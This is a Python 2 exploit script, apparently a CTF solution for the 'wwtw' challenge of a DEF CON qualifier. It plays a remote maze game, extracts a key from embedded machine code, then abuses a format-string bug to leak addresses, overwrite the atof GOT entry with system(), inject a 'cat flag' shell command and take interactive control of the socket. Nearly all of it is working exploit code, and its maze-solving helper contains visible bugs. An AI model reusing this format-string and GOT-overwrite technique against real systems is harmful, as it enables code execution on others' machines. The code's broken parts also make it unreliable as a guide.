import socket | |
import time | |
import re | |
from Pwning import * | |
pl = Payload() | |
def get_socket(host, port): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((host, port)) | |
return s | |
def send(s, msg): | |
s.sendall(msg + "\n") | |
print '[+] Send:', repr(msg) | |
def recv(s): | |
data = s.recv(4096) | |
print data | |
return data | |
def recv_until(s, text): | |
data = '' | |
while text not in data: | |
new_data = recv(s) | |
if new_data == '': | |
break | |
data += new_data | |
if 'TARDIS KEY:' in data: | |
return data | |
import time | |
time.sleep(0.01) | |
return data | |
""" | |
MAZE GAME | |
""" | |
g_map = None | |
g_found = False | |
g_path = None | |
MAP_WIDTH = 20 | |
MAP_HEIGHT = 20 | |
TARGET_X = 89 | |
TARGET_Y = 28 | |
g_best_solution = 'A' * 1000 | |
def get_valid_moves(moved_cells, x, y): | |
moves = [] | |
if x < MAP_WIDTH - 1 and g_map[y][x + 1] != 'A' and moved_cells[y][x + 1] == False: | |
moves.append('d') | |
if y < MAP_HEIGHT - 1 and g_map[y + 1][x] != 'A' and moved_cells[y + 1][x] == False: | |
moves.append('s') | |
if y > 0 and g_map[y - 1][x] != 'A' and moved_cells[y - 1][x] == False: | |
moves.append('w') | |
if x > 0 and g_map[y][x - 1] != 'A' and moved_cells[y][x - 1] == False: | |
moves.append('a') | |
return moves | |
def solve_rec(moved_cells, x, y, curr_path): | |
global g_best_solution | |
if g_found: | |
return | |
if len(curr_path) > len(g_best_solution): | |
return | |
if g_map[x][y] == 'E': | |
g_found = True | |
g_path = curr_path | |
available_moves = get_valid_moves(moved_cells, x, y) | |
for move in available_moves: | |
if move == 'w': | |
next_x = x | |
next_y = y - 1 | |
elif move == 's': | |
next_x = x | |
next_y = y + 1 | |
elif move == 'a': | |
next_x = x - 1 | |
next_y = y | |
else: | |
next_x = x + 1 | |
next_y = y | |
curr_path += move | |
moved_cells[next_y][next_x] = True | |
solve_rec(moved_cells, next_x, next_y, curr_path) | |
moved_cells[next_y][next_x] = False | |
curr_path = curr_path[:-1] # restore | |
def get_person_position(): | |
for i in xrange(MAP_HEIGHT): | |
for j in xrange(MAP_WIDTH): | |
if g_map[i][j] in '^<>V': | |
return (i, j) | |
def get_target_position(): | |
for i in xrange(MAP_HEIGHT): | |
for j in xrange(MAP_WIDTH): | |
if g_map[i][j] in 'ET': | |
return (i, j) | |
def get_moves(r, c): | |
return [(r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)] | |
def get_best_move(m): | |
global g_map | |
g_map = m | |
person = get_person_position() | |
target = get_target_position() | |
print 'person:', person | |
print 'target:', target | |
best_score = 0 | |
best_position_score = -1000000 | |
best_position = (0, 0) | |
for p_r, p_c in get_moves(person[0], person[1]): | |
nearest_enemy = 1000 | |
for r in xrange(MAP_HEIGHT): | |
for c in xrange(MAP_WIDTH): | |
if g_map[r][c] == 'A': | |
enemy_distance = abs(r - p_r) + abs(c - p_c) | |
if enemy_distance < nearest_enemy: | |
nearest_enemy = enemy_distance | |
target_distance = abs(target[0] - p_r) + abs(target[1] - p_c) | |
position_score = nearest_enemy - target_distance * 100 | |
print (p_r, p_c), nearest_enemy, target_distance, position_score | |
if position_score > best_position_score and nearest_enemy != 0: | |
best_position_score = position_score | |
best_position = (p_r, p_c) | |
if best_position_score == -1000000: | |
return None | |
if best_position[0] < person[0]: | |
return 'w' | |
if best_position[0] > person[0]: | |
return 's' | |
if best_position[1] < person[1]: | |
return 'a' | |
return 'd' | |
def solve(m): | |
global g_map | |
g_map = m | |
moved_cells = [] | |
for i in xrange(MAP_HEIGHT): | |
moved_cells.append([]) | |
for j in xrange(MAP_WIDTH): | |
moved_cells[i].append(False) | |
person_position = get_person_position() | |
solve_rec(moved_cells, person_position[0], person_position[1], '') | |
return g_path | |
""" | |
MAZE GAME | |
""" | |
def read_map(raw): | |
m = [0] * 20 | |
for i in xrange(20): | |
row = raw[i][3:] | |
m[i] = [c for c in row] | |
return m | |
def xor_string(a, b): | |
if len(a) > len(b): | |
a, b = b, a | |
ret = '' | |
for i in xrange(len(a)): | |
ret += chr( ord(a[i]) ^ ord(b[i]) ) | |
return ret | |
def get_key(): | |
import string | |
func = '5589E55383EC24E8DCFBFFFF81C33C410000C745F00A0000008D8306E0FFFF890424E8A1F9FFFF8B83F0FFFFFF8B00890424E8A1F9FFFF8D83B8BEFFFF8945F4EB5E8B45F40FB6000FBEC083E07F890424E832FAFFFF85C07442C7442408010000008D45EE89442404C7042400000000E843F9FFFF83F801751E0FB645EE0FBED08B45F40FB6000FBEC083E07F39C27407B801000000EB28836DF0018345F401837DF000759C90E83CF9FFFF8845EF807DEF0A7406807DEFFF75ECB80000000083C4245B5DC35589E55383EC24E816FBFFFF81C3764000008B45148845E4C745F000000000EB66C7442408010000008D45EF894424048B4508890424E8B7F8FFFF8945F4837DF4007F07B8FFFFFFFFEB58837DF4007507B8FFFFFFFFEB4B0FB645EF3A45E475108B55F08B450C01D0C600008B45F0EB328B45F08D50018955F089C28B450C01C20FB645EF88028B45F03B45107C928B45F08D50FF8B450C01D0C600008B45F083E80183C4245B5DC355'.decode('hex') | |
key = '' | |
for c in func: | |
if chr(ord(c) & 0x7f) in 'abcdefghijklmnopqrstuvwxyz' + 'abcdefghijklmnopqrstuvwxyz'.upper() + '0123456789': | |
key += chr(ord(c) & 0x7f) | |
if len(key) == 10: | |
break | |
return key | |
def _solve(): | |
key = get_key() | |
while True: | |
s = get_socket('wwtw_c3722e23150e1d5abbc1c248d99d718d.quals.shallweplayaga.me', 2606) | |
success = True | |
while True: | |
data = recv_until(s, 'Your move (w,a,s,d,q): ') | |
if 'TARDIS KEY:' in data: | |
break | |
raw_map = data.split('Your move (w,a,s,d,q):')[0].split('\n')[-21:-1] | |
try: | |
game_map = read_map(raw_map) | |
except: | |
success = False | |
break | |
best_move = get_best_move(game_map) | |
if best_move is None: | |
success = False | |
break | |
send(s, best_move) | |
if success: | |
send(s, key) | |
recv(s) | |
send(s,'\x00'*9) | |
recv(s) | |
time.sleep(2) | |
send(s,pl.p(0x55592B6C + 1)) | |
recv(s) | |
send(s,'\x00'*9) | |
print repr(recv(s)) | |
send(s,pl.p(0x55592B6C + 1)) | |
time.sleep(1) | |
send(s,'1\n') | |
recv_until(s, 'The TARDIS console is online!') | |
recv_until(s, 'Selection:') | |
send(s,'3\n') | |
recv_until(s, 'Coordinates: ') | |
send(s,'51.492137,-0.192878 {}\n'.format('%275$p')) | |
data = recv_until(s, 'would rip a hole in time and space. Choose again.') | |
match = re.findall(r'.+ (0x[0-9a-f]*) .+',data) | |
base_bin = int(match[0],16) - 0x1491 | |
read = base_bin + 0x5010 | |
atof_got = base_bin + 0x5080 | |
print 'Base Bin :',hex(base_bin) | |
recv_until(s, 'Coordinates: ') | |
send(s,'51.492137,-0.192878 {}\n'.format(pl.p(read) + '%20$s')) | |
data = recv_until(s, 'would rip a hole in time and space. Choose again.') | |
print repr(data) | |
data = data[52:] | |
read = pl.up(data[4:8]) | |
printf = pl.up(data[8:12]) | |
print 'read() : ',hex(read) | |
print 'printf() : ',hex(printf) | |
system = read - 0x9aa40 | |
print 'system() : ',hex(system) | |
recv_until(s, 'Coordinates: ') | |
send(s,pl.build32FormatStringBug(atof_got,system,20,'51.492137,-0.192878 ')) | |
recv_until(s, 'Coordinates: ') | |
send(s,',,,,,,;cat /home/wwtw/flag;,,,,,,,,\n') | |
tn = telnetlib.Telnet() | |
tn.sock = s | |
tn.interact() | |
break | |
_solve() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment